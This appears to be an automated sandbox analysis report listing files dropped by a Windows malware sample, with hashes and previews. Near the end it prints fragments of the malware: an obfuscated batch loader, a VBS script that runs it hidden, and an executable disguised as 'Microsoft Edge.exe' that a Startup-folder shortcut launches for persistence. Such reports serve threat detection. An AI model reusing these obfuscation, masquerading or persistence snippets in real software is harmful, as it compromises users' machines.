                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gayc31xg.vii.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpokzf3y.cup.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gtnobvxm.nlm.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hz3gyvmp.pmr.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jb1hmbpn.hag.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyltyf4t.bx1.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pha0uxom.kos.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_taybqybv.34g.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_th2m5j4z.xwp.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft Edge.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufgfxfqy.0h0.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4sko3s3.pks.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4g5ifnw.vdv.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygfmdykh.5nn.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z4vgfwbi.buy.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zghulekc.usj.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhtutyt2.ulu.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft Edge.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zs4zt5cr.uej.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zum4kwr1.kuc.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft Edge.exe

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):452608
                                                                                                          Entropy (8bit):5.459268466661775
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                                                          MD5:04029E121A0CFA5991749937DD22A1D9
                                                                                                          SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                                                          SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                                                          SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: spreadmalware.exe, Detection: malicious, Browse
                                                                                                          • Filename: Uni.exe, Detection: malicious, Browse
                                                                                                          • Filename: SplpM1fFkV.exe, Detection: malicious, Browse
                                                                                                          • Filename: rPO767575.cmd, Detection: malicious, Browse
                                                                                                          • Filename: Social_Security_Statement_Review.vbs, Detection: malicious, Browse
                                                                                                          • Filename: Pollosappnuevo.bat, Detection: malicious, Browse
                                                                                                          • Filename: PollosAplicaccion.bat, Detection: malicious, Browse
                                                                                                          • Filename: gcapi64.cmd, Detection: malicious, Browse
                                                                                                          • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                                                                                          • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 8 18:06:53 2025, mtime=Wed Jan 8 18:06:53 2025, atime=Wed Jan 8 18:06:53 2025, length=452608, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):801
                                                                                                          Entropy (8bit):5.0724602938336325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:8FqOOZm4aKkk4HSWCv68dY//41jL+7kgcYYRHHjA2WrHSuBRHHFHBBmV:8ON54twx+wdPjAnmuDndBBm
                                                                                                          MD5:32BA7A137F647E8039201F2142B6602D
                                                                                                          SHA1:C9F5CAF1C1025611A87D9D39F761288124DD86BC
                                                                                                          SHA-256:47FD378EAD3CF496121E1D2FE06B874D2BF3AB3320719F37EAAB3587BC96CBED
                                                                                                          SHA-512:85CF36CB347A98461A30002072646137DFA651DDB5AAC7208F91BD9D7597FFA771E32B2E3E6D6B1BD4C83F2B3554150216FE8BFD0C3D61EAD7FDF34F13C3D47A
                                                                                                          Malicious:true
                                                                                                          Preview:L..................F.... ...S.z.b..S.z.b..S.z.b............................:..DG..Yr?.D..U..k0.&...&......vk.v......u1.b..Mb.z.b......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^(Z.............................%..A.p.p.D.a.t.a...B.V.1.....(Z....Roaming.@......CW.^(Z................................R.o.a.m.i.n.g.....r.2.....(Z. .MICROS~1.EXE..V......(Z.(Z.............................8.M.i.c.r.o.s.o.f.t. .E.d.g.e...e.x.e.......`...............-......._...........M.e......C:\Users\user\AppData\Roaming\Microsoft Edge.exe..!.....\.....\.....\.....\.....\.M.i.c.r.o.s.o.f.t. .E.d.g.e...e.x.e.`.......X.......284992...........hT..CrF.f4... ...6......,.......hT..CrF.f4... ...6......,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                          C:\Users\user\AppData\Roaming\startup_str_533.bat

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:DOS batch file, ASCII text, with very long lines (52021), with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):388947
                                                                                                          Entropy (8bit):6.066295702056863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:qXrMg5IoSgfOShUrkui+P9fd7eTbgI6E+/HZNBzucGR4ythl5:q33Sg/6IbHr6F/HDBCykj5
                                                                                                          MD5:0D686395E9E0766B138059E0333731DF
                                                                                                          SHA1:0B52EBD0540F20D542D14CCE2167A6D4E219DBA5
                                                                                                          SHA-256:67DB2EF31F607B0FFE1F4E662526A64C356990B827BA31C3A7C4D6C5530A2D76
                                                                                                          SHA-512:B79AAA61D2202709265B566328850F83B2D090B2E9B60A36561A03CF1F8A40F67CA6AD9373F2E4480C3C13D6321D6DF5A69F657DEDB2111ED5D11CF7B3FB669E
                                                                                                          Malicious:true
                                                                                                          Preview:@echo off..WScript.Sleep 2000: CreateObject("WScript.Shell").Run "cmd.exe /c temp.bat", 0, True..Set fso=CreateObject("Scripting.FileSystemObject"): Set txt=fso.CreateTextFile("temp.bat",True): txt.WriteLine("@echo off"): txt.WriteLine("@echo off..%OqYWUXRgpVvGjxvaHJgl%s%OqYWUXRgpVvGjxvaHJgl%e%OqYWUXRgpVvGjxvaHJgl%t%OqYWUXRgpVvGjxvaHJgl%l%OqYWUXRgpVvGjxvaHJgl%o%OqYWUXRgpVvGjxvaHJgl%c%OqYWUXRgpVvGjxvaHJgl%a%OqYWUXRgpVvGjxvaHJgl%l%OqYWUXRgpVvGjxvaHJgl% %OqYWUXRgpVvGjxvaHJgl%e%OqYWUXRgpVvGjxvaHJgl%n%OqYWUXRgpVvGjxvaHJgl%a%OqYWUXRgpVvGjxvaHJgl%b%OqYWUXRgpVvGjxvaHJgl%l%OqYWUXRgpVvGjxvaHJgl%e%OqYWUXRgpVvGjxvaHJgl%d%OqYWUXRgpVvGjxvaHJgl%e%OqYWUXRgpVvGjxvaHJgl%l%OqYWUXRgpVvGjxvaHJgl%a%OqYWUXRgpVvGjxvaHJgl%y%OqYWUXRgpVvGjxvaHJgl%e%OqYWUXRgpVvGjxvaHJgl%d%OqYWUXRgpVvGjxvaHJgl%e%OqYWUXRgpVvGjxvaHJgl%x%OqYWUXRgpVvGjxvaHJgl%p%OqYWUXRgpVvGjxvaHJgl%a%OqYWUXRgpVvGjxvaHJgl%n%OqYWUXRgpVvGjxvaHJgl%s%OqYWUXRgpVvGjxvaHJgl%i%OqYWUXRgpVvGjxvaHJgl%o%OqYWUXRgpVvGjxvaHJgl%n%OqYWUXRgpVvGjxvaHJgl%..set "eWUTGecWzP

                                                                                                          C:\Users\user\AppData\Roaming\startup_str_533.bat:Zone.Identifier

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26
                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                          Malicious:false
                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                          C:\Users\user\AppData\Roaming\startup_str_533.vbs

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):115
                                                                                                          Entropy (8bit):4.837602038266756
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:FER/8ClVRK+pn2Hot+kiEaKC5DXy77RLYHhn:FERblVR/p2IwknaZ5DXyvRa
                                                                                                          MD5:E90BCFDB2A85E5F21827A73BD5011CFC
                                                                                                          SHA1:6FB2D35E1257C8054DE6ED4128C2A4D6AF57A2A3
                                                                                                          SHA-256:C1BD8BB628C42520E9756DDC1B4C0C8623C9FF87ABC30A7AAA7D8251D39F13C6
                                                                                                          SHA-512:A2DEB29045766680AE71E6761E9D780592F84AB347A0C77DF4D1B6EABF65D605A639ECFAE8A47535CFBA10487D9DFC591ED7B30B7BFBBDFC283EC7E7B98B6FFE
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          Preview:CreateObject(Replace("WScript.Shell","SubChar","")).Run """C:\Users\user\AppData\Roaming\startup_str_533.bat""", 0

                                                                                                          \Device\Null

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43
                                                                                                          Entropy (8bit):4.297675800911845
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:MbxJsqGCMABeSOL9y:gi9CaL0
                                                                                                          MD5:44DC34D4AD9A6E4D044CB94CE40844F7
                                                                                                          SHA1:2CFDDAA41DA5481618F59DEEC7907856325B384F
                                                                                                          SHA-256:D0AE5FE259AF8887552EE9E33F64F045F4349B3BE5078FF0AA061355523FECFF
